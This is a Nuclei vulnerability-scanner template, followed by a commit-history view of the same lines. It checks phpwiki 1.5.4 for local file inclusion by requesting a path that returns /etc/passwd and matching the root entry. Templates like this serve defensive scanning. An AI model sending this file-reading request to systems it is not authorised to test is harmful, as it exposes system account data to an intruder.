nuclei-templates/vulnerabilities/other/phpwiki-lfi.yaml

id: phpwiki-lfi

info:
  name: phpwiki 1.5.4 - XSS / Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
  reference: https://www.exploit-db.com/exploits/38027
  tags: phpwiki,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/phpwiki/index.php/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
Create phpwiki-lfi.yaml 2021-09-07 09:54:45 +00:00			`id: phpwiki-lfi`

			`info:`
			`name: phpwiki 1.5.4 - XSS / Local File Inclusion`
			`author: 0x_Akoko`
			`severity: high`
Add description 2021-10-21 05:51:56 +00:00			`description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.`
Create phpwiki-lfi.yaml 2021-09-07 09:54:45 +00:00			`reference: https://www.exploit-db.com/exploits/38027`
			`tags: phpwiki,lfi`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/phpwiki/index.php/passwd"`

			`matchers-condition: and`
			`matchers:`

			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0"`

			`- type: status`
			`status:`
			`- 200`